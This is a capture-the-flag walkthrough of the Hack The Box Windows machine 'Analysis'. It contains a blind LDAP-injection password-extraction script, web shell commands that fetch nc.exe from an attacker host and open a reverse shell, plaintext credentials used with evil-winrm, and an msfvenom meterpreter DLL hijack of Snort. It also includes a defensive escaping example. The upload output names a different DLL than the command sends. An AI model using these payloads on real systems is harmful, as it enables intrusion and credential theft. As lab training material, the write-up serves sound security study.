Analysis
OS: Windows
Difficulty: Hard
Points: 40
Nmap
ports=$(nmap -p- --min-rate=5000 -T4 10.129.96.0 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -vvv -p $ports -sC -sV -oN nmap.txt 10.129.96.0
Nmap scan report for 10.129.96.0
Host is up, received reset ttl 127 (0.074s latency).
Scanned at 2024-01-23 10:46:59 EST for 72s
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
80/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2024-01-23 15:47:06Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 127
3306/tcp open mysql syn-ack ttl 127 MySQL (unauthorized)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
33060/tcp open mysqlx? syn-ack ttl 127
| fingerprint-strings:
| LDAPBindReq:
| *Parse error unserializing protobuf message"
| HY000
| LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
| HY000
| oracle-tns:
| Invalid message-frame."
|_ HY000
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Enumeration
Fuzzing vhosts.
ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.analysis.htb" -u http://analysis.htb/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://analysis.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.analysis.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
internal [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 73ms]
Fuzzing directories.
gobuster dir -u http://internal.analysis.htb/ -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://internal.analysis.htb/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/dashboard (Status: 301) [Size: 174] [--> http://internal.analysis.htb/dashboard/]
/employees (Status: 301) [Size: 174] [--> http://internal.analysis.htb/employees/]
/users (Status: 301) [Size: 170] [--> http://internal.analysis.htb/users/]
gobuster dir -u http://internal.analysis.htb/employees -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://internal.analysis.htb/employees
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,asp,aspx
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 1085]
/Login.php (Status: 200) [Size: 1085]
gobuster dir -u http://internal.analysis.htb/users -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,asp,aspx -t 20
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://internal.analysis.htb/users
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,txt,html,asp,aspx
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/list.php (Status: 200) [Size: 17]
Requesting that URL returns the following message.
curl -i http://internal.analysis.htb/users/list.php
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/10.0
X-Powered-By: PHP/8.2.5
Date: Tue, 23 Jan 2024 16:50:06 GMT
Content-Length: 17
missing parameter
Fuzzing parameters.
ffuf -w /usr/share/wordlists/dirb/big.txt -u "http://internal.analysis.htb/users/list.php?FUZZ=jdoe" -fw 2
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://internal.analysis.htb/users/list.php?FUZZ=jdoe
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 2
________________________________________________
name [Status: 200, Size: 406, Words: 11, Lines: 1, Duration: 82ms]
Enumerating users.
/opt/windows/kerbrute userenum /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -d analysis.htb --dc 10.129.96.0
Version: v1.0.3 (9dad6e1) - 01/23/24 - Ronnie Flathers @ropnop
2024/01/23 11:06:21 > Using KDC(s):
2024/01/23 11:06:21 > 10.129.96.0:88
2024/01/23 11:07:12 > [+] VALID USERNAME: jdoe@analysis.htb
2024/01/23 11:07:55 > [+] VALID USERNAME: ajohnson@analysis.htb
2024/01/23 11:09:31 > [+] VALID USERNAME: cwilliams@analysis.htb
2024/01/23 11:10:14 > [+] VALID USERNAME: wsmith@analysis.htb
2024/01/23 11:12:38 > [+] VALID USERNAME: jangel@analysis.htb
2024/01/23 11:21:33 > [+] VALID USERNAME: technician@analysis.htb
LDAP Injection
We find that the application is vulnerable to LDAP injection: a wildcard in the name parameter lists every user.
http://internal.analysis.htb/users/list.php?name=*
Fuzzing attributes.
http://internal.analysis.htb/users/list.php?name=technician)(userPassword=*
Of all the attributes we find, the one that can hold useful information is description.
import string
import requests

# The injected ')' closes the name filter; the rest of the value is appended as a
# second filter on the description attribute, which is where the password lives.
URL = "http://internal.analysis.htb/users/list.php"
PREFIX = "technician)(description="
EMPTY_LEN = 406  # response size when the filter matches nothing (see the ffuf run above)

# '(' and ')' would break the filter and '*' is the LDAP wildcard, so a literal
# asterisk is sent in its RFC 4515 escaped form "\2a" and cannot act as a wildcard.
CANDIDATES = {c: c for c in string.printable if c not in "()*"}
CANDIDATES["*"] = r"\2a"

password = ""
while True:
    known = "".join(CANDIDATES[c] for c in password)
    for char, encoded in CANDIDATES.items():
        # The trailing '*' turns the guess into a prefix match on the description value.
        r = requests.get(URL, params={"name": PREFIX + known + encoded + "*"})
        if len(r.text) != EMPTY_LEN:
            password += char
            print(password)
            break
    else:
        # No character extended the prefix: the whole value has been recovered.
        break
Using the script above we obtain the following password.
technician@analysis.htb : 97NTtl*4QP96Bv
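The root cause here is a filter built by string concatenation. As an added example that is not part of the original writeup, the snippet below applies RFC 4515 escaping to the filter value (the same thing PHP's built-in `ldap_escape($value, '', LDAP_ESCAPE_FILTER)` does) and shows that the injection payload used above collapses to a single, harmless clause; the `build_filter_*` helpers are hypothetical names, not the application's code.

```python
# Added example (not from the writeup): RFC 4515 escaping of LDAP filter values.
# The vulnerable page interpolates the 'name' parameter straight into a filter,
# so "technician)(description=*" closes the name clause and appends a second one.
# Escaping the value first keeps it a literal string.

# Characters with special meaning inside an LDAP filter assertion value.
_ESCAPES = {
    "\\": r"\5c",
    "*": r"\2a",
    "(": r"\28",
    ")": r"\29",
    "\x00": r"\00",
}


def escape_filter_value(value: str) -> str:
    """Return value with LDAP filter metacharacters hex-escaped (RFC 4515)."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(name: str) -> str:
    """The vulnerable pattern: user input concatenated into the filter (hypothetical helper)."""
    return f"(name={name})"


def build_filter_safe(name: str) -> str:
    """Same filter with the value escaped; input can no longer alter the structure."""
    return f"(name={escape_filter_value(name)})"


def filter_clause_count(ldap_filter: str) -> int:
    """Count unescaped '(' to see how many clauses the filter really contains."""
    count = 0
    i = 0
    while i < len(ldap_filter):
        if ldap_filter[i] == "\\":
            i += 3  # skip a \XX escape sequence
            continue
        if ldap_filter[i] == "(":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    payload = "technician)(description=*"  # the injection used in this writeup
    for f in (build_filter_unsafe(payload), build_filter_safe(payload)):
        print(f, "->", filter_clause_count(f), "clause(s)")
```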
File Upload Reverse Shell
Using the credentials obtained we can authenticate to the login portal.
http://internal.analysis.htb/employees/login.php
We can upload a web shell through the application.
http://internal.analysis.htb/dashboard/form.php
We use the following commands to obtain a reverse shell.
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=mkdir+c:\temp
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=curl+10.10.14.9/nc.exe+-o+c:\temp\nc.exe
http://internal.analysis.htb/dashboard/uploads/shell.php?cmd=c:\temp\nc.exe+10.10.14.9+1234+-e+cmd.exe
Lateral Movement
Using winPEAS we find the password of the user jdoe.
We connect via WinRM.
evil-winrm -i 10.10.11.250 -u 'jdoe' -p '7y4Z4^*y9Zzj'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents> type ..\Desktop\user.txt
2234595e802096e282d2f9e421e6d664
*Evil-WinRM* PS C:\Users\jdoe\Documents>
Privilege Escalation
Binary with DLL hijacking potential.
Snort(Snort)[C:\Snort\bin\snort.exe /SERVICE] - Autoload - No quotes and Space detected
Possible DLL Hijacking in binary folder: C:\Snort\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
Snort configuration.
type C:\snort\etc\snort.conf
DLL Hijacking
Create the DLL.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.9 LPORT=4444 -f dll -o sf_engine.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of dll file: 9216 bytes
Saved as: sf_engine.dll
Configure Metasploit.
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost tun0
set lport 4444
run
Upload the DLL.
upload /root/htb/Box/Analysis/sf_engine.dll C:\snort\lib\snort_dynamicpreprocessor\sf_engine.dll
Info: Uploading /root/htb/Box/Analysis/shell.dll to C:\snort\lib\snort_dynamicpreprocessor\shell.dll
Data: 12288 bytes of 12288 bytes copied
Info: Upload successful!
Once Metasploit is configured, we wait a minute for the shell to come back.
References
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/LDAP%20Injection/README.md#defaults-attributes
https://hyp3rlinx.altervista.org/advisories/SNORT-DLL-HIJACK.txt